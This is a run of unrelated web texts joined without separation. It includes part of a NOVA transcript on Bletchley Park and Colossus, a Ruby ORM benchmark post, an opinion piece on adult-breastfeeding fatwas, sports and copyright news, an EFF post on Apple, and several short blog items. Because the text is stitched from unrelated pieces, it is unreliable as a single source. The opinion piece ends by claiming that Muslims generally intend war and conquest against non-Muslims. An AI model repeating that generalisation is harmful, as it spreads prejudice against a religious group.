The resulting slight changes enabled the codebreakers to strip off the random letters that were cloaking the message .
PETER HILTON : For me the real excitement was this business of getting these two texts out of one sequence of gibberish , it was marvelous .
Never , never met anything that was quite as exciting .
Especially since you knew that these were vital messages .
NARRATOR : Now that they had decoded the message , could they use it to figure out exactly how the Lorenz machine worked ?
For the next two months , the codebreakers hunted laboriously for patterns in the endless strings of obscuring letters .
Eventually they were able to reconstruct the precise mechanics of the Lorenz - a machine they had never seen .
They even built their own replica .
Since it was used to crack the mysterious Fish code , they called the replica Tunny , after a fish in the tuna family .
Once the Lorenz settings were found , Tunny could turn the messages into plain German .
Despite the advances in understanding Fish , it still took at least a month to decode a single message , and by then the information was generally useless .
LORD JENKINS :
It was a curious life , it involved mental gymnastics and it could be , could be very wearing , particularly if you did n't succeed .
I mean , you could spend nights in which you got nowhere at all .
You did n't get a single break , you just tried , played around , played around through this bleak long night with total frustration , and your brain felt literally raw , your psyche or whatever it is felt frustrated , but your brain always literally felt raw at the end of it .
NARRATOR : But the whole process was about to be speeded up .
At the post office research station in London , a brilliant young telephone engineer hit upon the idea of an electronic machine that would automate the hunt for the Fish settings .
The machine would be nothing less than the world 's first programmable computer .
THOMAS H. FLOWERS : I tried to tell Bletchley Park what my ideas were , but you must understand the technology that I was using was then only just known to very few people in the whole world .
NARRATOR : Though the codebreakers were skeptical , Flowers was convinced the answer lay in vacuum tubes - hundreds of them .
TONY SALE : Tommy Flowers started in March 1943 with a blank sheet of paper , never been done before .
I mean Flowers was thinking of a machine with 1,500 valves in it .
The biggest machine ever at that time had 150 valves in it , so this was an enormous leap into the dark , but Flowers was convinced he could make it work - nobody else was but he was - and so he started more or less off his own bat .
THOMAS H. FLOWERS : We just told people to do things .
We had the power , we had the authority to tell anybody - we had the first priority in the whole country for everything , and we could just tell people what we wanted and not tell them what it was for .
NARRATOR : Over Christmas 1943 , Tommy Flowers installed the world 's first programmable computer at Bletchley Park .
Eventually ten more were built , all dedicated to analyzing the secret messages of the German high command .
They were given the name Colossus .
Colossus could read a coded message at high speed and then search for the settings of the Lorenz code wheels .
It could accomplish this in minutes instead of a month .
TONY SALE : Tommy Flowers realized that it was possible to read paper tape optically at very high speed , and this is going at 5,000 characters a second , 30 miles an hour the tape goes through there .
And it 's quite incredible that it can actually read information at that speed .
THOMAS H. FLOWERS : In fact , we did a test on how fast we could drive it before the tape broke , and we got up to nearly 60 miles an hour , so we decided that was a bit - when it did break it went all over the place , it just disintegrated .
NARRATOR : Colossus began operating five months before D - Day , the critical invasion of France in June1944 that would turn the tide against Hitler .
Tanks and guns choked every main road and street in southern England .
The Allies prepared an elaborate deception .
They set out to trick the Germans into thinking that the attack on Normandy was simply a diversion .
Double agents in Britain relayed the false information to Berlin , but only the codebreakers could tell if the deception was working .
PETER CALVOCORESSI :
The Germans were deceived for a very long time , far more than we expected and far more successfully .
But we also got a bonus , if you like .
That is , we knew they were deceived , because from Ultra we could see that they were not moving troops into Normandy , they had to say to themselves , they 'll pop over to Calais .
The Germans were not only deceived , they were known to be deceived .
NARRATOR : It was an enormous subterfuge and an even bigger gamble .
Around the clock , the Allies searched for the merest hint of German suspicion .
The invasion was poised to strike .
But then , a vital message was decoded at Bletchley Park .
ARTHUR J. LEVENSON : Just before D - Day , Marshal Rommel , the desert fox , was appointed inspector general of the western defenses , and he sent this enormously long message , very detailed description of the western defenses , where each unit was located and what equipment they had .
It was a - it was 70,000 letters , which was read .
NARRATOR : When Bletchley Park decoded Rommel 's message , it contained alarming news .
German tanks were massing at the exact spot where American troops were about to parachute into Normandy .
ARTHUR J. LEVENSON :
They were going to drop the - one of the airborne divisions right on top of a German tank division .
They would have been massacred .
They changed it .
NARRATOR : It was June 4th , 1944 .
Reassured by the codebreakers that all was well , the massive army began to move forward .
Then came a discouraging setback .
PAT BING :
We went on duty that night and they said , " Well , tonight is the invasion and they 're going across . "
And so we slaved away .
Well , of course as everybody knows , by about four o'clock in the morning , the weather was so bad they had to bring them all back .
Which of course was bad luck for us because they then came and said , well you can't go walking about Bletchley when you know that the invasion 's going to be tomorrow night , so we just had to stay there .
NARRATOR : Twenty - four hours later , the Allies launched the biggest military invasion in history .
SARAH BARING :
We had dinner and we came out at eleven o'clock , and I suddenly started to hear a hum and it got louder and louder and louder , and I knew what it was .
And about ten minutes later the sky was black with aircraft towing gliders , and my friend said , I wonder what that is , and I said , I have n't the faintest idea .
WILLIAM BUNDY :
And about three o'clock , I think it was , suddenly there was a real rustle and very shortly the word spread that there had been German traffic saying that paratroopers were dropping all over the place .
So we knew , we knew this was it .
NARRATOR : The decoded messages showed that the deception had worked .
Hitler 's troops were split between Normandy and Calais and were unable to counter the onslaught .
Over half the German forces had remained in the northeast , awaiting an attack that never came .
At Bletchley Park , those who knew about the invasion were n't allowed to leave for 48 hours .
Even now , nobody was taking any chances .
PAT BING :
We staggered out feeling rather the worse for wear , but knew it was then general knowledge , and went home , and my lady I was billeted on said to me , where the bloody hell have you been ?
And I said , well I 've been working .
She said , " Well you 've missed all the fun . "
And I said , " What fun ? "
And she said , " Well there was the invasion , it 's been on the radio " - ' cause no television - it 's been on the radio .
I said , " Oh lovely , " you know , and went to bed .
BARBARA QUIRK : " Tuesday , 6th of June , 1944 , invasion began . 10 a.m. breakfast , letter from Maureen , spent morning washing and ironing , on at four , life quite hectic .
Feel somewhat anticlimax-y now the second front has begun .
Not a bad day , really . "
NARRATOR : It had not been a bad day for the codebreakers either .
They had accurately foretold the position of all but two of the 62 German divisions .
Enigma and Lorenz messages were read throughout the D - Day operation .
By the end of the war , they had handled at least 63 million characters of high level code between Hitler and his generals .
In the months that followed , Bletchley Park would continue to chronicle the disintegration of Nazi Germany - right until the end of the war .
Finally , at the cost of at least 50 million lives , the Second World War came to an end .
LORD BRIGGS : When the final signal came through from Donitz surrendering , it was in clear and not in code , and that was extremely interesting because you felt the war was then really over .
When messages did begin to come through in clear , then all the secrets of the war really were beginning to fade into history already .
NARRATOR : In the roll call of those who had brought about victory , the codebreakers of Bletchley Park would never be mentioned .
The operations there were to stay a secret for the next 30 years .
Eight of the ten Colossus machines were destroyed .
The remaining two were moved to British secret service headquarters , where they may have played a significant part in the codebreaking operations of the Cold War .
In fact , the Russian military had developed a code that was similar to the high command 's Fish code .
So the techniques invented at Bletchley Park were still to prove vital in a very different kind of conflict .
In 1960 , the order finally came to destroy the last two Colossus machines .
THOMAS H. FLOWERS : That was a terrible mistake .
I was instructed to destroy all the records which I did .
I took all the drawings and plans and all the information about Colossus on paper and put it in the boiler fire , saw it burn .
NARRATOR : Tommy Flowers returned to the post office and was forgotten .
In all the secrecy , Colossus never received recognition as the world 's first programmable computer .
Instead , that honor was to go to the American Eniac .
As for the codebreakers , they all dispersed , some back to universities and others into the fledgling computer industry .
A few stayed on in the British secret service , while some of the Americans returned to Arlington Hall .
The most innovative thinker of all , the man whose inventiveness had been at the center of Bletchley Park 's success , died tragically .
In 1954 , Alan Turing took his own life after being persecuted as a security risk because he was gay .
DONALD MICHIE : Alan Turing is one of the figures of the century .
The world of computing and now the world of the Internet stems from Alan Turing 's fundamental ideas .
There were other great men in Bletchley Park , but in the long , long hall of history , I think Turing 's name will probably be the number one in terms of consequence for mankind .
NARRATOR : Apart from the Atom Bomb , there was no greater secret in World War II than the work of the codebreakers of Bletchley Park .
Their breakthroughs gave the Allies a vital edge in the U - boat war , the tank battles against Rommel , and the D - Day invasion .
But their impact was felt far beyond the battlefield .
Eavesdropping and decryption won a new prominence in the minds of politicians as well as generals .
The transatlantic alliance , that took its first hesitant steps at Bletchley Park , would mature and prove critical during the Cold War .
And the roots of today 's computer era trace back directly to the dazzling inventiveness of Turing , Flowers , and their wartime colleagues .
In the end , though , Bletchley Park 's greatest achievement lay not in broken ciphers but in the hundreds of thousands , perhaps millions , of lives it saved .
TONY SALE : Historians generally agree that it shortened the war by two years .
Bletchley Park did n't win the war , that was won by people with guns and bullets and things out in the field , but I think Bletchley Park is a great exemplar , particularly to the younger generation now , of brains over bullets .
You can defeat an enemy intellectually , and that was shown here .
The World Wide Web relies on more sophisticated codes than were used in all of World War II .
On NOVA 's Website , find out how cryptography affects you today more than you may think .
To order this show , or any other NOVA program , for $ 19.95 plus shipping and handling , call WGBH Boston Video at 1-800-255-9424 .
NOVA is a production of WGBH Boston .
Major funding for NOVA is provided by the Park Foundation , dedicated to education and quality television .
This program is funded in part by Northwestern Mutual Life , which has been protecting families and businesses for generations .
Have you heard from the quite company ?
Northwestern Mutual Life .
C|Net , bringing the digital age into focus .
CNET .COM , the source for computers and technology .
And by the Corporation for Public Broadcasting and by contributions to your PBS station from viewers like you .
Thank you .
This is PBS .
Next time on NOVA : they risked it all in a perilous flight to the finish .
It was a very important secret , and it paid off .
Now , get the real story behind the race to fly faster than sound .
Two weeks ago I developed my first event - driven web framework for Ruby , Fastr .
It helped me understand why running a web framework in an event loop is so natural .
As I continued to tackle more features in Fastr , it was time to tackle persistence – notably , database access .
AsyncRecord is / will be an ORM , similar to ActiveRecord – with one major difference – it does n’t block .
AsyncRecord currently uses em-mysql to access a MySQL database .
How it usually works
In most ORMs , when you attempt to access the database , everything in that thread will block until a response is received .
This means that you waste time – just waiting .
The CPU may be idle , but you cannot handle any more requests .
( Typically you start multiple instances of your application to get past this , unfortunately each instance requires more resources on your server )
How AsyncRecord works
When you access something in the database with AsyncRecord , the request is sent to the database server , but control returns to the application immediately after the packet ( s ) are sent .
When the server responds , which could be 20ms or 200 ms later , a callback that you specify is invoked .
One important thing about accessing a database asynchronously , especially in web frameworks , is the ability to defer a response .
Fastr has built - in support for deferred responses , a - la EventMachine / Thin .
A deferred response is when you tell the web server that you will send data to the client some time in the future , and the server is free to handle more requests until you are ready to respond .
Benchmarking
As I was implementing AsyncRecord , I knew it would be faster – but I was n’t sure by how much .
I setup a very simple Rails 2.3.5 application , as well as a Fastr application ( from the latest source ) .
My goal was to make an application that has a single page , which shows 5 usernames from the database .
Rails controller :
class MainController < ApplicationController def index users = [ ]
User . all ( : limit => 5 ) . each do | user | users << user .
username end headers [ ' Content - Type ' ] = ' text / plain ' render ( : text => users . join ( "
" ) ) end end
Fastr controller :
class MainController < Fastr :: Controller def index defer_response ( 200 , { " Content - Type " => " text / plain " } ) do | response | User . all ( : limit => 5 ) do | users | users .
each do | user | response .
send_data( " #{ user .
username }
" ) end response .
succeed end end end end
The Numbers
Fastr
Average Latency : 123 ms Requests per second : 385 r/s
Rails
Average Latency : 2040 ms
Requests per second : 42 r/s
The tests were performed using JMeter .
100 concurrent requests ( 10 requests per connection ) .
I also ran some tests using apache bench , here are the results :
ab -c 100 -n 1000 http://127.0.0.1:5000/
Fastr
Average Latency : 90 ms Requests per second : 1100 r/s
Rails
Average Latency : 2235 ms
Requests per second : 44 r/s
Conclusion
I am extremely happy with what AsyncRecord can do – and I hope to make it even better .
I will be moving it out of Fastr and into its own project soon .
Fastr GitHub : http://github.com/chrismoos/fastr
Last month , I wrote a PJM article dealing with some of Islam 's " problematic " practices , specifically those attributable to the Muslim prophet Muhammad .
One of these — the Muslim phenomenon of " adult - breastfeeding , " or rida ' al - kabir — is making headlines again , precisely three years to the day since it last created controversy in ( and inevitable mockery of ) the Islamic world .
According to Gulf News :
Exactly three years ago , on May 22 , 2007 , an Egyptian scholar was disciplined by Al Azhar University , one of Islam 's most prestigious institutions , after he issued a fatwa calling upon women to breastfeed their male colleagues .
Dr. Izzat Attiyah said that his fatwa offered a way around mixing of the sexes in the work place since breast - feeding established a maternal relation even if the beneficiary was not the woman 's biological son or daughter .
Now , a high - ranking Saudi , Sheikh Abdul Mohsin al - Abaican , a consultant at Saudi Arabia 's royal court , has issued a fatwa asserting that
women could give their milk to men to establish a degree of maternal relations and get around a strict religious ban on mixing between unrelated men and women .
[ Because ] a man who often entered a house and came in contact with the womenfolk there should be made symbolically related to the women by drinking milk from one of the women .
Under the fatwa , the act would preclude any sexual relations between the man and the donor woman and her relatives .
Sheikh al - Abaican thus " modernizes " Dr. Izzat 's position — that the man must breastfeed directly from the teat — by suggesting that " the man should take the milk , but not directly from the breast of the woman .
He should drink it and then becomes a relative of the family , a fact that allows him to come in contact with the women without breaking Islam 's rules about mixing . "
( So much for simply being in control of oneself without going through bizarre rituals . )
At any rate , where do all these " adult breastfeeding " ideas originate ?
As usual : Muhammad .
A canonical hadith tells of a woman who once asked Muhammad what to do about the fact that a young boy who had been living with her and her husband had grown into manhood : that a non-relative adult male was freely residing with them , seeing his wife without her veils , was upsetting to the husband .
So the prophet told her to " breastfeed " the man .
Shocked , she responded saying that he was a grown man ; Muhammad said — according to some traditions , while laughing — " I know . "
The woman breastfed the man , and reportedly her husband was no longer upset , as the act of breastfeeding turned him into a kinsman .
Muhammad 's favorite wife , Aisha — the " mother of the believers " — frequently relied on this practice to meet with non-related males ( one of the greatest debates of her time revolved around how many " breastfeeds " were enough — one , five , or ten — to make a man a " family - member . "
See here for more hadiths ) .
The importance of this breastfeeding business has less to do with its sensationalist quality and more to do with what it says about the overbearing and intrusive nature of Sharia law in Muslim life .
Muslims cannot escape adult breastfeeding simply because it is contained in Islam 's most canonical hadiths ( including Sahih Muslim and the Sunan of Abu Dawud and Ibn Maja ) .
Moreover , it has been addressed — and endorsed — by such Islamic authorities as Ibn Taymiyya and Ibn Hazm .
To reject this hadith is to reject the sources and methodology of usul al - fiqh — in short , to reject Sharia law .
Furthermore , al - Abaican 's supposedly " moderate " position — that men should not drink the milk straight from the teat but rather from a cup — actually further demonstrates the inescapable strictures of Sharia law : for his sophistry relies on the fact that the hadiths do not literally indicate that men must drink straight from the nipple ( probably because it would have been redundant to say so , as there were few other ways to derive breast milk in 7th century Arabia , " breastfeeding pumps " being non-existent then ) .
Yet , by not out - and - out condemning the practice , al - Abaican demonstrates that he , too , dares not stray from the bounds of Muhammad 's literal words .
Now , here 's the real problem ( from an infidel point of view ) :
If , in the year 2010 , Muslims still feel compelled to be true to " adult breastfeeding , " simply because 7th century Muhammad said so , surely they wholeheartedly embrace their prophet 's thoroughly documented and unequivocal words concerning the infidel .
Look at it this way : the issue of adult breastfeeding is embarrassing for Muslims ; far from providing them with any sort of advantage or benefits , it places them , especially their women , in a ludicrous position ( indeed , it is ranked first in this list of " top ten bizarre or ridiculous fatwas " ) .
So why is it still a relevant issue among Muslims ?
Because Muhammad said so .
Thus , like it or not , Muslims must somehow come to grips with it .
What , then , of Muhammad 's other commandments — commandments that , if upheld , far from embarrassing Muslims , provide them with power , wealth , and honor — that is , commandments that jibe quite well with mankind 's most primordial impulses ?
I speak of Muhammad 's ( and by extension Sharia law 's ) unequivocal commandments for Muslims to wage war ( " jihad " ) upon the infidel , to plunder the infidel of his wealth and women , and to keep the infidel in perpetual subjugation — all things that define Islam 's history vis -à - vis the infidel .
Indeed , Muhammad himself once warned Muslims : " Because you have forsaken jihad , taking hold of cows ' tails and dealing in merchandise , Allah has adorned you with shame and you will never be able to shake it off yourselves until you repent to Allah and return to your original positions [ as jihadists on the offensive ] , " The Al Qaeda Reader , p.162 .
In short , the Muslim mentality that feels the need to address adult breastfeeding , simply because Muhammad once advised it , must certainly be sold on the prophet 's constant incitements for war and conquest .
Living in an era where the Muslim world is significantly weaker vis-à - vis the infidel world , and so currently incapable of living up to such bellicose commandments , one may overlook this fact .
But the intention is surely there .
One need only look to 21st century Muslims debating an absurdity like " adult breastfeeding " to be sure of that .
SALT LAKE CITY --
Utah is poised to become the 12th member of the Pac - 10 , as the conference quickly pivoted Wednesday to invite the Utes after being turned down by Texas and four other members of the Big 12 two days ago .
Utah officials did not immediately say whether the invitation would be accepted .
However , a source tells ESPN that Utah will join the Pac - 10 .
Utah associate athletic director Liz Abel said the athletics department would not comment until Thursday after the school 's board of trustees meets to discuss the school 's conference affiliation .
A news conference was scheduled for 3 p.m. ET at the football stadium following the meeting .
Pac -10 officials are expected to attend Thursday 's news conference in Utah .
Utah has been a member of the MWC since the league began in 1999 -- and one of its most successful in football and basketball .
There had been speculation on Tuesday that Utah would be the next school to be approached by the Pac - 10 .
When asked about the possibility , school president Michael Young told The Associated Press " we would n't anticipate making a move of this magnitude without the concurrence of our board of trustees . "
Utah would not have to pay a penalty to depart the MWC , per conference rules .
A message left with Randy Dryer , chairman of the board of trustees , was not immediately returned Wednesday .
If Utah bolts the Mountain West , it would be the latest in a string of conference affiliation changes .
Last week , Colorado decided to leave the Big 12 and accept an invitation to join the Pac - 10 .
Nebraska also has said it will leave the Big 12 for the Big Ten , while Boise State is fleeing the Western Athletic Conference to join the Mountain West .
The Mountain West called a news conference for Thursday after Utah's .
Earlier in the week , Texas , Oklahoma , Texas A&M , Texas Tech and Oklahoma State recommitted to the Big 12 instead of hopping to the Pac - 10 .
That left the Pac - 10 in need of another member to reach the 12 required to hold a football championship game .
Pac - 10 spokeswoman Danette Leighton declined to say when Utah would begin competing in the Pac - 10 if it accepts the conference 's invitation .
The addition of Utah now gives Colorado a geographical rival and travel partner .
The league is likely to divide into two six - team divisions , and how that will shake out is unclear .
The other members of the Pac - 10 are USC , UCLA , Stanford , California , Washington , Washington State , Arizona , Arizona State , Oregon and Oregon State .
Utah had already previously scheduled games with Oregon in 2011 , and Washington State and Colorado in 2012 and 2013 .
Utah officials have long been frustrated about their inability to play for a football national championship while in the Mountain West .
Utah had an undefeated season in 2008 but was not invited to the national title game .
It defeated Alabama in the Sugar Bowl .
Utah also went undefeated in 2004 and did not play for the national championship .
Under the Bowl Championship Series , the champions of six conferences have automatic bids to play in top - tier bowl games , while the other conferences such as the Mountain West do n't .
Those six conferences also receive more money than the other conferences .
Utah Attorney General Mark Shurtleff , angered that the Utes were denied an opportunity to play for a national title , has said he 's investigating the BCS for possible antitrust violations .
He said although Utah is Exhibit A as to why the BCS is unfair , the investigation would continue if Utah changed conferences .
He plans to meet with the U.S. Department of Justice in July to discuss the matter .
" We 're convinced the system as set up is anticompetitive , " he said .
" It goes way beyond the University of Utah . "
Utah lawmakers , including U.S. Sen.
Orrin Hatch , also have expressed their frustrations with the BCS .
Last year , the state legislature adopted a resolution calling for a playoff system to determine college football 's national champion after an undefeated Utah was shut out of the national title game for the second time in four years .
Utah 's lawmakers contend the BCS formula is flawed and gives schools from the major conferences an unfair advantage that would make it impossible for a school such as the Mountain West 's Brigham Young University to win the national title , as the Cougars did in 1984 when they were a member of the WAC .
Information from ESPN.com 's Diamond Leung , ESPN's Joe Schad and The Associated Press contributed to this report .
The federal government does n't recognize same - sex marriages under the Defense of Marriage Act , but the issue has been percolating in the states since May 17 , 2004 , when Massachusetts became the first state to make marriage legal for same - sex couples , and other states followed .
Below , a state - by - state rundown of same - sex marriage legislation .
...
Being in debt is never fun .
You carry a weight on your shoulders , and are bound by the obligations that you must fulfill .
It stinks , but at least there are some protections for people who are n’t able to pay , and rules that govern how debts can be collected .
In the past , debtors were not given as much leeway .
In fact they were treated quite harshly .
They were often sent to debtor ’s prison :
During Europe ’s Middle Ages , debtors , both men and women , were locked up together in a single large cell , until their families paid their debt .
Debt prisoners often died of disease contracted from other debt prisoners .
Conditions included starvation and abuse from other prisoners .
If the father of a family was imprisoned for debt , the family business often suffered while the mother and children fell into poverty .
Unable to pay the debt , the father often remained in debtors ’ prison for many years .
Some debt prisoners were released to become serfs or indentured servants ( debt bondage ) until they paid off their debt in labor .
Debtor ’s prisons continued to be used in the United States and United Kingdom into the 1800s , at which time both countries outlawed the practice of putting people in jail for their debts .
It was outlawed in the United States in 1833 , and abolished in the UK in 1869 .
You might be surprised to find out , however , that some countries to this day still use the practice .
Debtors in the United Arab Emirates , including Dubai , can be imprisoned for failing to pay their debts .
You Can Go To Jail For Your Debt – Even Today
While many people think being imprisoned for your debt in the U.S. is a thing of the past , they are n’t completely correct .
I was reading my local paper in Minnesota this past week when I discovered a series of articles talking about people who have been sent to jail for their debts .
While they have technically been sent to jail in many of these cases because they missed a court date related to their debt , or because they missed a court mandated debt payment , the fact remains that they were incarcerated in part because they have debt .
It ’s not a crime to owe money , and debtors ’ prisons were abolished in the United States in the 19th century .
But people are routinely being thrown in jail for failing to pay debts .
In Minnesota , which has some of the most creditor - friendly laws in the country , the use of arrest warrants against debtors has jumped 60 percent over the past four years , with 845 cases in 2009 , a Star Tribune analysis of state court data has found .
Not every warrant results in an arrest , but in Minnesota many debtors spend up to 48 hours in cells with criminals .
Consumer attorneys say such arrests are increasing in many states , including Arkansas , Arizona and Washington , driven by a bad economy , high consumer debt and a growing industry that buys bad debts and employs every means available to collect .
Whether a debtor is locked up depends largely on where the person lives , because enforcement is inconsistent from state to state , and even county to county .
While you ’re probably OK if you follow up on court dates , and make your court ordered payments , if you miss a payment or a court date you could be in trouble .
Haekyung Nielsen , 27 , of Bloomington , said police showed up at her house on a civil warrant two weeks after she gave birth through Caesarean section .
A debt buyer had sent her court papers for an old credit - card debt while she was in the hospital ; Nielsen said she did not have time to respond .
Her baby boy , Tyler , lay in the crib as she begged the officer not to take her away .
“ Thank God , the police had mercy and left me and my baby alone , ” said Nielsen , who later paid the debt .
“ But to send someone to arrest me two weeks after a massive surgery that takes most women eight weeks to recover from was just unbelievable . ”
While I ’m all for personal responsibility , and for following through on your debt obligations , some of the tactics being used by these debt collecters , and being followed up on by the law enforcement officials do seem a bit draconian .
In some senses it seems like the debt collectors ( credit sharks in suits as Dave Ramsey calls them ) have taken over .
“ The law enforcement system has unwittingly become a tool of the debt collectors , ” said Michael Kinkley , an attorney in Spokane , Wash . , who has represented arrested debtors .
“ The debt collectors are abusing the system and intimidating people , and law enforcement is going along with it . ”
How often are debtors arrested across the country ?
No one can say .
No national statistics are kept , and the practice is largely unnoticed outside legal circles .
“ My suspicion is the debt collection industry does not want the world to know these arrests are happening , because the practice would be widely condemned , ” said Robert Hobbs , deputy director of the National Consumer Law Center in Boston .
Now if people are able to pay their debts , and are instead choosing to ignore their obligations and not pay , that ’s one thing .
If , however , they are n’t able to pay because of medical issues or other problems , why would you put them in jail ?
Bail Is Often The Same Amount As The Debt
One thing people are finding once they ’ve been put in jail is that their bail payment is set at the exact same amount of their debt owed .
When they post bail their money goes directly to the debt collector .
Hennepin County automatically sets bail at the judgment amount or $ 2,500 , whichever is less .
This policy was adopted four years ago in response to the high volume of debtor default cases , say court officials .
Some judges say the practice distorts the purpose of bail , which is to make sure people show up in court .
“ It ’s certainly an efficient way to collect debts , but it ’s also highly distasteful , ” said Hennepin County District Judge Jack Nordby .
“ The amount of bail should have nothing to do with the amount of the debt . ”
If friends or family post a debtor ’s bail , they can expect to kiss the money goodbye , because it often ends up with creditors , who routinely ask judges for the bail payment .
This does seem to be a bit shady – basically the law enforcement and judicial systems are being used as an extension of the debt collection agencies .
I ’m sure the debt collectors will abuse this system since they ’ve never been known for their fair debt collection practices .
How To Stay Out Of Jail For Your Debt
So how can you ensure that you ’ll never end up on the wrong side of a jail cell door – especially if you have debt ?
Do n’t avoid bill collectors or warrants .
.
Make sure to read any documents you get from bill collectors or the courts .
.
If you get a summons and complaint , you are being sued .
You must show up in court .
Respond promptly to a summons either denying or admitting to the debt .
Show up for all court hearings .
So to stay out of jail , follow up on your debts , and if you are being sued or given a court date – show up !
If you do n’t you could end up losing by default , and have a warrant sworn out for your arrest .
What do you think about the ways that debt collectors are now using the law enforcement and judicial system to collect debts for them ?
Do you think it is right ?
Should debtors be afforded more protections , or are they getting what they deserve ?
Should new laws be passed ?
Tell us your thoughts in the comments .
With the new iPhone 4 hitting stores this week , it seems like a good time to take a look at the impact Apple 's business model has had on the stuff EFF cares about most – innovation and your digital rights and expectations .
But first , a little historical perspective .
From our earliest days , EFF has been concerned about the ecosystem that exists around communications technologies .
We used to refer to this work as our Open Platform Proposal , and we 've spent the last 20 years fighting initiatives by governments and private companies that would have damaged the end - to - end interoperability of the Internet and interfered with innovation , free expression and the fundamental freedom to tinker .
The principle is simple : just as you get to choose whatever after - market modification you want to make to your car , whatever disk drive you want to add to your mainframe , and whatever third party add - on you want for your software , you should be able to choose the apps and hardware you want for your iPhone .
You should be able to choose your network provider .
And you should be able to leave the walled garden and continue to use your device after you 've moved on .
This is about end - user choice , and Apple does n't seem to believe you deserve any .
Through its control over the iPhone 's software and its mandatory approval process , Apple is pushing the idea that a manufacturer should be able to dictate how things can interoperate with a product at every layer – from the software , applications , and services that can be developed and sold , to the consumer 's use of the device , to the other devices that can physically plug into it .
The consequences of this approach are all too clear .
Consider these examples :
These are exactly the kinds of moves that we generally trust customer choice to solve – if you could get your apps from other stores , then Apple 's censorship and anti-competitive moves would be much less problematic .
Apple claims it needs to build a walled garden to protect users .
From where we ’re sitting , however , the walled garden looks very much like an effort to control the user and re-set traditional expectations about what you can do with the products you buy .
As Jason Snell put it over at MacWorld , Apple should offer iPad and iPhone owners " an option that lets you install Apps from ' unknown sources . ' ”
Think of it as a " freedom of choice " button , for those who elect to leave the " safety " of Apple 's walled garden of pre-approved apps .
Apple 's certainly not the only company trying to control your user experience .
We 're involved in a lawsuit right now where Facebook has sued a company for creating an app that enables end - users to log into their multiple social networking accounts and aggregate messages , friend lists , and other data .
Microsoft 's expulsion of users from Xbox Live for altering their consoles is another example .
There is a troubling trend of companies cutting off their customers when they learn that the customers have tried to control , without company permission , some aspect of the hardware or software they purchased .
To quote our dear friend Cory Doctorow , " If someone takes something that belongs to you and puts a lock on it that you do n't have a key for , that lock is n't in your best interests . "
It ’s abundantly clear that Apple is no exception to this rule .
If Apple and its fellow travelers truly care about protecting the user experience – in the long term as well as the short term – they should abandon the lock - down mentality and support your right to control your own devices .
They should support the interoperability that has fostered consumer choice and the rapid growth of new technologies .
They should give up the keys to the garden .
LONDON ( Reuters Life ! ) -
A rising human population is probably pushing plants and animals into extinction faster than at any point in the world ’s history , said veteran British broadcaster and conservationist David Attenborough .
“ The problem about these changes is that they are happening at an extremely fast rate , and probably much faster than at any other time , ” he told Reuters , referring to species destruction .
Earlier this month , the United Nations said that governments had failed to meet a 2010 target to halt a slide in the numbers of wildlife species , or biodiversity .
The IUCN ( International Union for Conservation of Nature ) conservation group says extinctions have accelerated in the past 50 years , and are happening 1,000 times faster than without the impact of human activities .
Attenborough reckoned that the only “ competitor ” for the rate of destruction now was the extinction of the dinosaurs .
“ If it is true that the end of the dinosaurs was due to a small asteroid banging into the planet , presumably that might have had very , very swift consequences , ” he said .
“ That has by no means been proved .
A lot of the things that disappeared at the end of the cretaceous ( period ) 65 million years ago did so over a period of millions of years , ” he said before giving a lecture late on Wednesday at the London Wetland Center , a wildlife preserve .
The 84 - year old naturalist laid the blame on a rising world population , projected to reach 9 billion by 2050 from 6.8 billion now .
“ I am quite certain that things will not be as good in 50 years time as they are now , ” he said .
But he cautioned against getting too gloomy after a 50 - year broadcasting career spent celebrating life on Earth .
“ I ’m quite sure that people wo n’t care about biodiversity , the variety of wildlife , unless they know something about it .
You do n’t have to say everything has to be about doom and gloom , or everything has to be about mindless wonder .
There ’s plenty of room for both and television does both . ”
Here 's the PLA 's collection of Foursquare stalking calls .
view this post on it , listen to our podcast on the subject , and read the PLA Forums board called Let 's Stalk People where you can post your own Foursquare stalking calls .
The following video contains some of our favorite Foursquare stalking calls , but there are even more calls below .
It ’s no secret that the Recording Industry of South Africa ( RiSA ) has been fighting hard for the rights of musicians and publishers in South Africa .
Part of that campaign is the StopPiracy.org.za website , which states that you may not “ compress sound recordings to MP3s ” .
This may come as a surprise to consumers who forked out anything between R100 and R200 for an original CD , and now wants to listen to this CD on their iPod or MP3 player .
When contacted for comment , RiSA representatives found and quoted the relevant pieces of legislation .
Simply put , the Copyright Act of 1978 states , “ You may not make a copy of a sound recording without the permission of the author . ”
Dr Tobias Schönwetter from the Intellectual Property Research Unit at the University of Cape Town and legal lead of Creative Commons South Africa agrees with RiSA ’s interpretation .
“ Our act allows the making of copies of musical works for private use , which , on the face of it , seems to declare legal the compressing of legally obtained CDs .
However , CDs are not only ‘ musical works ’ but are also protected as ‘ sound recordings ’ – and a similar private use exception for sound recordings regrettably does n’t exist , ” said Schönwetter .
This essentially means that you ca n’t ‘ rip ’ your CDs to any file format .
“ If you ’re ripping it from a disc you ’re making a copy , ” says RiSA .
Andrew Rens , founding legal lead of Creative Commons South Africa , adds that you can compress a sound recording if you hold the copyrights to the sound recording .
“ You can also compress a sound recording if rights to the sound recording are in the public domain , ” says Rens .
This raises the question how you could legally listen to your CDs on your MP3 player ?
The simple answer is :
You can ’t !
RiSA suggests that people should purchase the music in digital format despite the fact that they may already own the CD .
“ There are online stores where you can legally download MP3s , ” RiSA responds .
“ Musica , Pick ‘n Play , Nokia … ”
What then about the more esoteric genres of music one might be able to find a CD of , but wo n’t be able to download an MP3 of ?
To this RiSA could offer no solution .
“ This clearly illustrates the need not just to reform copyright law but reform it in a progressive way that takes consumer ’s rights into account , ” Rens said .
Copyright laws in South Africa << comments and views
I was seven when this photograph was taken of me attempting Daniel - San 's crane technique in the sand .
It must have been around this age that Karate Kid jump - kicked its way into my subconscious , sketching an outline for my life and my own incarnation of the American Dream : Focus your chi , beat up your enemies , win the trophy .
The new Karate Kid happens to feature Kung Fu .
Although some have a problem with that literal misnomer ( Karate is not the same martial art form as Kung Fu ) , I believe this apparent discrepancy speaks to deeper , common roots and philosophies shared by all martial arts .
I 'm cool with it .
I have three favorite films that parallel with important phases of my life .
The most recent phase pairs up with Seven Samurai by Akira Kurosawa , a period piece about the cost of glory , the strength of quiet character , and teamwork for the sake of common good .
You could say this film defines the part of my life working at Gizmodo , developing it into a large group effort .
In my twenties and teenage years , Enter the Dragon taught me about the confidence a young Chinese man could have .
With his Jeet Kune
Do style of abandoning the confinement of style , Bruce Lee taught me to take what is best and avoid being bound to traditional limitations , and rigid , old sets of rules .
The film that pairs up with the earliest phase of my life is the original Karate Kid , about the dream of a young man 's life– and for me , naturally , the early dreams of my own life .
